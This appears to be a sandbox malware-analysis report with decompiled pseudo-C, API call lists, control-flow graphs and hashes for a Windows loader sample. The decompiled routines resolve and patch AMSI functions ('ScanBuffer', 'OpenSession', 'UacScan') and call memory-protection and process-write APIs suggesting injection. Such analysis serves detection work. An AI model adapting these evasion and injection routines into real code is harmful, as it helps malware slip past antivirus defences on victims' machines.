                                                                                                			E02175D0C(CHAR* __eax) {
				CHAR* _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t74;
				CHAR* _t99;
				CHAR* _t100;
				intOrPtr _t104;
				struct HINSTANCE__* _t112;
				void* _t115;
				void* _t117;
				intOrPtr _t118;

				_t115 = _t117;
				_t118 = _t117 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t115);
					_push(0x2175e11);
					_push( *[fs:eax]);
					 *[fs:eax] = _t118;
					_v28 = 5;
					E02175B48( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E02175F78, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t104);
					 *[fs:eax] = _t104;
					_push(E02175E18);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							lstrcpynA( &_v289, _v8, 0x105);
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5);
							_t112 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t99 =  &(( &_v289)[lstrlenA( &_v289)]);
								while( *_t99 != 0x2e && _t99 !=  &_v289) {
									_t99 = _t99 - 1;
								}
								_t74 =  &_v289;
								if(_t99 != _t74) {
									_t100 =  &(_t99[1]);
									if(_v22 != 0) {
										lstrcpynA(_t100,  &_v22, 0x105 - _t100 - _t74);
										_t112 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t112 == 0 && _v17 != 0) {
										lstrcpynA(_t100,  &_v17, 0x105 - _t100 -  &_v289);
										_t112 = LoadLibraryExA( &_v289, 0, 2);
										if(_t112 == 0) {
											_v15 = 0;
											lstrcpynA(_t100,  &_v17, 0x105 - _t100 -  &_v289);
											_t112 = LoadLibraryExA( &_v289, 0, 2);
										}
									}
								}
							}
							return _t112;
						} else {
							goto L3;
						}
					}
				}
			}






















                                                                                                0x02175d0d
                                                                                                0x02175d0f
                                                                                                0x02175d17
                                                                                                0x02175d28
                                                                                                0x02175d2d
                                                                                                0x02175d46
                                                                                                0x02175d4d
                                                                                                0x02175d8f
                                                                                                0x02175d91
                                                                                                0x02175d92
                                                                                                0x02175d97
                                                                                                0x02175d9a
                                                                                                0x02175d9d
                                                                                                0x02175daf
                                                                                                0x02175dd2
                                                                                                0x02175df2
                                                                                                0x02175df2
                                                                                                0x02175df6
                                                                                                0x02175dfc
                                                                                                0x02175dff
                                                                                                0x02175e02
                                                                                                0x02175e10
                                                                                                0x02175d4f
                                                                                                0x02175d64
                                                                                                0x02175d6b
                                                                                                0x00000000
                                                                                                0x02175d6d
                                                                                                0x02175d82
                                                                                                0x02175d89
                                                                                                0x02175e28
                                                                                                0x02175e3b
                                                                                                0x02175e40
                                                                                                0x02175e49
                                                                                                0x02175e73
                                                                                                0x02175e78
                                                                                                0x02175e77
                                                                                                0x02175e77
                                                                                                0x02175e87
                                                                                                0x02175e8f
                                                                                                0x02175e95
                                                                                                0x02175e9a
                                                                                                0x02175ead
                                                                                                0x02175ec2
                                                                                                0x02175ec2
                                                                                                0x02175ec6
                                                                                                0x02175ee5
                                                                                                0x02175efa
                                                                                                0x02175efe
                                                                                                0x02175f00
                                                                                                0x02175f1b
                                                                                                0x02175f30
                                                                                                0x02175f30
                                                                                                0x02175efe
                                                                                                0x02175ec6
                                                                                                0x02175e8f
                                                                                                0x02175f39
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x02175d89
                                                                                                0x02175d6b

                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02170000,021907B4), ref: 02175D28
                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02170000,021907B4), ref: 02175D46
                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02170000,021907B4), ref: 02175D64
                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02175D82
                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02175E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02175DCB
                                                                                                • RegQueryValueExA.ADVAPI32(?,02175F78,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02175E11,?,80000001), ref: 02175DE9
                                                                                                • RegCloseKey.ADVAPI32(?,02175E18,00000000,?,?,00000000,02175E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02175E0B
                                                                                                • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02175E28
                                                                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02175E35
                                                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02175E3B
                                                                                                • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02175E66
                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02175EAD
                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02175EBD
                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02175EE5
                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02175EF5
                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02175F1B
                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02175F2B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                • API String ID: 1759228003-2375825460
                                                                                                • Opcode ID: e695effeb28be790e893cf2a72e2dcd2b608f35c2da384c9952f218932cb7d13
                                                                                                • Instruction ID: d8b6b3f297cd2f662b9e6c92bc0759af69f4806d45174505deace2d9da629096
                                                                                                • Opcode Fuzzy Hash: e695effeb28be790e893cf2a72e2dcd2b608f35c2da384c9952f218932cb7d13
                                                                                                • Instruction Fuzzy Hash: C4514671AC025C7EFB21D6A4CC46FEFB7BEDB94744F9001A1AA04E61C1EB749A448F60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02186388 Relevance: 32.7, APIs: 11, Strings: 7, Instructions: 1151memorylibraryloaderCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 3353 2186388-218638c 3354 2186391-2186396 3353->3354 3354->3354 3355 2186398-21863bc 3354->3355 3356 21863c6-21863ce InetIsOffline 3355->3356 3357 21863c1 call 217304c 3355->3357 3358 21863de-21863e0 3356->3358 3359 21863d0-21863dc call 21748f4 3356->3359 3357->3356 3360 21863ea-2186a9f call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 VirtualAlloc call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 217cac8 GetProcAddress FreeLibrary VirtualAlloc call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2185df0 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 LoadLibraryA GetProcAddress VirtualProtect call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 3358->3360 3361 21863e5 call 21748f4 3358->3361 3359->3360 3566 2186ef5-2187214 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2175a04 3360->3566 3567 2186aa5-2186aa6 3360->3567 3361->3360 3742 2187216-2187282 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 3566->3742 3743 2187287-21873fc call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2185e2c call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 3566->3743 3569 2186aac-2186bbd call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 3567->3569 3627 2186bc3-2186ca0 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 3569->3627 3628 2186cc6-2186ec4 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 VirtualAlloc call 2173518 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 3569->3628 3711 2186ca5-2186cc0 3627->3711 3786 2186ec9-2186eef call 2185df0 3628->3786 3711->3628 3742->3743 3818 21873fe-2187415 call 2185f6c 3743->3818 3819 2187416-2187504 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 3743->3819 3786->3566 3786->3569 3818->3819 3850 218750a-218750b 3819->3850 3851 218764d-218768d call 21755fc call 21748c4 * 2 3819->3851 3852 2187511-21875ee call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 3850->3852 3887 21875f3-2187647 call 2185dd8 VirtualProtect FreeLibrary 3852->3887 3887->3851 3887->3852
                                                                                                C-Code - Quality: 61%
                                                                                                			E02186388() {
				char _v8;
				intOrPtr _v12;
				intOrPtr _t7;
				void* _t9;
				intOrPtr _t16;
				intOrPtr _t24;

				_t16 = 0x47;
				do {
					_push(0);
					_push(0);
					_t16 = _t16 - 1;
				} while (_t16 != 0);
				_t1 =  &_v8;
				 *_t1 = _t16;
				_v12 =  *_t1;
				_v8 = _t7;
				_push(0x218768e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				 *0x0000270E =  *0x0000270E & 0x02194598;
				_t9 = E0217304C(0);
				_push(_t9);
				L021858FC();
				if(_t9 == 0) {
					asm("sbb [edx], al");
					E021748F4(0x2194598, 0x21876b8);
					L8:
					_push(0x21876c4);
				}
				E021748F4(0x2194598, 0x21876a8);
				goto L8;
			}









                                                                                                0x0218638c
                                                                                                0x02186391
                                                                                                0x02186391
                                                                                                0x02186393
                                                                                                0x02186395
                                                                                                0x02186395
                                                                                                0x02186398
                                                                                                0x02186398
                                                                                                0x0218639e
                                                                                                0x021863a1
                                                                                                0x021863b1
                                                                                                0x021863b6
                                                                                                0x021863b9
                                                                                                0x021863bb
                                                                                                0x021863c1
                                                                                                0x021863c6
                                                                                                0x021863c7
                                                                                                0x021863ce
                                                                                                0x021863e3
                                                                                                0x021863e5
                                                                                                0x021863ea
                                                                                                0x021863ea
                                                                                                0x021863ea
                                                                                                0x021863d7
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • InetIsOffline.URL(00000000,00000000,0218768E,?,?,?,?,00000000,00000000), ref: 021863C7
                                                                                                  • Part of subcall function 02183690: LoadLibraryA.KERNEL32(00000000,00000000,02183766), ref: 021836CA
                                                                                                  • Part of subcall function 02183690: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02183766), ref: 021836D4
                                                                                                  • Part of subcall function 02183690: GetProcAddress.KERNEL32(77090000,00000000), ref: 021836FD
                                                                                                  • Part of subcall function 02183690: RtlMoveMemory.N(021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218371E
                                                                                                  • Part of subcall function 02183690: GetCurrentProcess.KERNEL32(021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 02183735
                                                                                                  • Part of subcall function 02183690: NtFlushVirtualMemory.N(00000000,021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218373B
                                                                                                  • Part of subcall function 02183690: FreeLibrary.KERNEL32(77090000,00000000,00000000,00000000,02183766), ref: 02183746
                                                                                                • VirtualAlloc.KERNEL32(-01D94524,00029000,00003000,00000040,ScanBuffer,02194598,021876C4,OpenSession,02194598,021876C4), ref: 0218658A
                                                                                                  • Part of subcall function 0217CAC8: SetErrorMode.KERNEL32 ref: 0217CAD2
                                                                                                  • Part of subcall function 0217CAC8: LoadLibraryA.KERNEL32(00000000,00000000,0217CB1C,?,00000000,0217CB3A), ref: 0217CB01
                                                                                                • GetProcAddress.KERNEL32(76670000,VirtualAlloc), ref: 021866DD
                                                                                                • FreeLibrary.KERNEL32(76670000,76670000,VirtualAlloc,ScanBuffer,02194598,021876C4,OpenSession,02194598,021876C4,UacScan,02194598,021876C4,-01D94524,00029000,00003000,00000040), ref: 021866ED
                                                                                                • VirtualAlloc.KERNEL32(10410000,00000200,00001000,00000004,76670000,76670000,VirtualAlloc,ScanBuffer,02194598,021876C4,OpenSession,02194598,021876C4,UacScan,02194598,021876C4), ref: 02186708
                                                                                                • LoadLibraryA.KERNEL32(kernel32,ScanBuffer,02194598,021876C4,OpenSession,02194598,021876C4,UacScan,02194598,021876C4), ref: 0218687B
                                                                                                • GetProcAddress.KERNEL32(76670000,VirtualProtect), ref: 02186890
                                                                                                • VirtualProtect.KERNEL32(10411000,00000200,00000002,02194554,76670000,VirtualProtect,kernel32,ScanBuffer,02194598,021876C4,OpenSession,02194598,021876C4,UacScan,02194598,021876C4), ref: 021868B0
                                                                                                • VirtualAlloc.KERNEL32(-02193538,00027C00,00001000,00000004,ScanBuffer,02194598,021876C4,OpenSession,02194598,021876C4,OpenSession,02194598,021876C4,ScanBuffer,02194598,021876C4), ref: 02186DCB
                                                                                                  • Part of subcall function 02185F6C: InetIsOffline.URL(00000000,00000000,02186329,?,?,?,?,0000000C,00000000,00000000), ref: 02185FA4
                                                                                                • VirtualProtect.KERNEL32(-02193538,00027B6C,00000000,02194554,ScanBuffer,02194598,021876C4,OpenSession,02194598,021876C4,ScanBuffer,02194598,021876C4,OpenSession,02194598,021876C4), ref: 02187633
                                                                                                • FreeLibrary.KERNEL32(76670000), ref: 0218763F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryVirtual$AddressAllocFreeLoadProc$InetMemoryOfflineProtect$CurrentErrorFlushHandleModeModuleMoveProcess
                                                                                                • String ID: OpenSession$ScanBuffer$UacScan$VirtualAlloc$VirtualProtect$kernel32$teSe
                                                                                                • API String ID: 3418975139-2221745942
                                                                                                • Opcode ID: 23a1dda562b9a66cac775bc1f2b33199e08ab085f07e95d49f09b74fa2cd7e82
                                                                                                • Instruction ID: 09f64e217acb5fae456eea2d46b7d40be1e719f20bbf5ea7ac4537f2579822f3
                                                                                                • Opcode Fuzzy Hash: 23a1dda562b9a66cac775bc1f2b33199e08ab085f07e95d49f09b74fa2cd7e82
                                                                                                • Instruction Fuzzy Hash: E5B2FF39AC01199FEB21FB64D8C4EDEB7F6AF85700F2044E6A405AB254DB30AE46CF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0218779C Relevance: 32.3, APIs: 10, Strings: 8, Instructions: 773librarymemoryloaderCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 4427 218779c-21877a0 4428 21877a5-21877aa 4427->4428 4430 21877ac-21877e1 call 217304c InetIsOffline 4428->4430 4433 21877f1-21877f3 4430->4433 4434 21877e3-21877ef call 21748f4 4430->4434 4436 21877fd-2187929 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 4433->4436 4437 21877f8 call 21748f4 4433->4437 4434->4436 4481 2187933-2187ae5 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 VirtualAlloc call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 4436->4481 4437->4436 4538 2187aeb-2187cac call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 217cac8 GetProcAddress FreeLibrary VirtualFree VirtualAllocEx 4481->4538 4539 2187cae-2187cb1 4481->4539 4538->4539 4540 2187cc3-2187e7c call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2186388 call 21755fc 4539->4540 4541 2187cb3-2187cbd 4539->4541 4634 21883c2-2188400 call 21748c4 call 2175398 call 21748c4 4540->4634 4635 2187e82-21883a6 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 217cac8 GetProcAddress FreeLibrary WriteProcessMemory call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2185b0c 4540->4635 4541->4481 4541->4540 4788 21883ab-21883bd NtProtectVirtualMemory 4635->4788 4788->4634
                                                                                                C-Code - Quality: 42%
                                                                                                			E0218779C(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v9;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v108;
				char _v112;
				intOrPtr _v116;
				char _v120;
				char _v124;
				char _v128;
				intOrPtr _v132;
				char _v136;
				char _v140;
				char _v144;
				intOrPtr _v148;
				char _v152;
				char _v156;
				char _v160;
				intOrPtr _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				intOrPtr _v184;
				char _v188;
				char _v192;
				char _v196;
				intOrPtr _v200;
				char _v204;
				char _v208;
				char _v212;
				intOrPtr _v216;
				char _v220;
				char _v224;
				char _v244;
				char _v248;
				intOrPtr _v252;
				char _v256;
				char _v260;
				char _v264;
				intOrPtr _v268;
				char _v272;
				char _v276;
				char _v280;
				intOrPtr _v284;
				char _v288;
				char _v292;
				char _v296;
				intOrPtr _v300;
				char _v304;
				char _v308;
				char _v312;
				intOrPtr _v316;
				char _v320;
				char _v324;
				char _v328;
				char _v332;
				intOrPtr _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				intOrPtr _v368;
				char _v372;
				char _v376;
				char _v380;
				intOrPtr _v384;
				char _v388;
				char _v392;
				char _v396;
				intOrPtr _v400;
				char _v404;
				char _v408;
				void* __ecx;
				void* _t206;
				void* _t209;
				intOrPtr _t286;
				intOrPtr _t288;
				PVOID* _t291;
				void* _t387;
				intOrPtr _t402;
				struct HINSTANCE__* _t448;
				struct HINSTANCE__* _t449;
				struct HINSTANCE__* _t451;
				long _t453;
				void* _t454;
				long* _t529;
				long* _t530;
				struct HINSTANCE__* _t578;
				struct HINSTANCE__* _t579;
				struct HINSTANCE__* _t581;
				intOrPtr _t585;
				intOrPtr _t587;
				PVOID* _t590;
				void* _t593;
				intOrPtr _t596;
				intOrPtr _t609;
				void* _t631;
				void* _t636;
				void* _t641;
				void* _t647;
				void* _t652;
				void* _t657;
				void* _t662;
				void* _t667;
				void* _t672;
				void* _t677;
				intOrPtr _t680;
				intOrPtr _t682;
				void* _t688;
				void* _t693;
				void* _t698;
				void* _t703;
				void* _t708;
				void* _t715;
				void* _t720;
				void* _t725;
				void* _t730;
				void* _t735;
				void* _t741;
				void* _t746;
				void* _t751;
				void* _t755;
				void* _t756;
				void* _t757;
				intOrPtr _t760;
				intOrPtr _t761;

				_t757 = __esi;
				_t755 = __edi;
				_t593 = __ebx;
				_t206 = __eax;
				_t760 = _t761;
				_t596 = 0x32;
				do {
					_push(0);
					_push(0);
					_t596 = _t596 - 1;
				} while (_t596 != 0);
				_t1 =  &_v8;
				 *_t1 = _t596;
				_push(_t593);
				_push(_t757);
				_push(_t755);
				_v8 =  *_t1;
				_t756 = _t206;
				_push(_t760);
				_push(0x2188401);
				_push( *[fs:eax]);
				 *[fs:eax] = _t761;
				_t209 = E0217304C(0x270e);
				_push(_t209);
				L021858FC();
				if(_t209 == 0) {
					E021748F4(0x2194598, 0x218842c);
				} else {
					E021748F4(0x2194598, 0x218841c);
				}
				_push(0x2188438);
				_push( *0x2194598);
				_push("Initialize");
				E02174C24();
				E02174A98( &_v16, E02174D64(_v20));
				_push(_v16);
				E02174BB0( &_v28,  *0x2194598, 0x2188438);
				E02174A98( &_v24, E02174D64(_v28));
				_pop(_t631); // executed
				E02183690(_v24, 0x2194598, _t631, 0x2194520); // executed
				_push(0x2188438);
				_push( *0x2194598);
				_push("OpenSession");
				E02174C24();
				E02174A98( &_v32, E02174D64(_v36));
				_push(_v32);
				E02174BB0( &_v44,  *0x2194598, 0x2188438);
				E02174A98( &_v40, E02174D64(_v44));
				_pop(_t636); // executed
				E02183690(_v40, 0x2194598, _t636, 0x2194520); // executed
				_push(0x2188438);
				_push( *0x2194598);
				_push("ScanBuffer");
				E02174C24();
				E02174A98( &_v48, E02174D64(_v52));
				_push(_v48);
				E02174BB0( &_v60,  *0x2194598, 0x2188438);
				E02174A98( &_v56, E02174D64(_v60));
				_pop(_t641); // executed
				E02183690(_v56, 0x2194598, _t641, 0x2194520); // executed
				_v9 = 0;
				_push(0);
				_push(_v8);
				asm("cdq");
				asm("adc edx, [esp+0x4]");
				 *0x219451c =  *((intOrPtr*)(_v8 + 0x3c)) + _v88;
				 *0x2194524 = 0x10000000;
				do {
					_push(0x2188438);
					_push( *0x2194598);
					_push(0x2188480);
					_push(0x218848c);
					_push(0x2188498);
					_push(0x21884a4);
					_push( *0x2194598);
					_push(0x21884b0);
					_push(0x21884bc);
					E02174C24();
					E02174A98( &_v64, E02174D64(_v68));
					_push(_v64);
					E02174BB0( &_v76,  *0x2194598, 0x2188438);
					E02174A98( &_v72, E02174D64(_v76));
					_pop(_t647); // executed
					E02183690(_v72, 0x2194598, _t647, 0x2194520); // executed
					_push(0x2188438);
					_push( *0x2194598);
					_push("ScanBuffer");
					E02174C24();
					E02174A98( &_v80, E02174D64(_v84));
					_push(_v80);
					E02174BB0( &_v92,  *0x2194598, 0x2188438);
					E02174A98( &_v88, E02174D64(_v92));
					_pop(_t652); // executed
					E02183690(_v88, 0x2194598, _t652, 0x2194520); // executed
					 *0x2194524 =  *0x2194524 + 0x10000;
					_t286 =  *0x219451c; // 0x4a7fda0
					_t48 = _t286 + 0x50; // 0x29000
					_t288 =  *0x219451c; // 0x4a7fda0
					_t49 = _t288 + 0x34; // 0x400000
					_t291 = VirtualAlloc( *_t49 +  *0x2194524,  *_t48, 0x3000, 0x40); // executed
					 *0x2194520 = _t291;
					_push(0x2188438);
					_push( *0x2194598);
					_push("UacScan");
					E02174C24();
					E02174A98( &_v96, E02174D64(_v100));
					_push(_v96);
					E02174BB0( &_v108,  *0x2194598, 0x2188438);
					E02174A98( &_v104, E02174D64(_v108));
					_pop(_t657); // executed
					E02183690(_v104, 0x2194598, _t657, 0x2194520); // executed
					_push(0x2188438);
					_push( *0x2194598);
					_push("ScanBuffer");
					E02174C24();
					E02174A98( &_v112, E02174D64(_v116));
					_push(_v112);
					E02174BB0( &_v124,  *0x2194598, 0x2188438);
					E02174A98( &_v120, E02174D64(_v124));
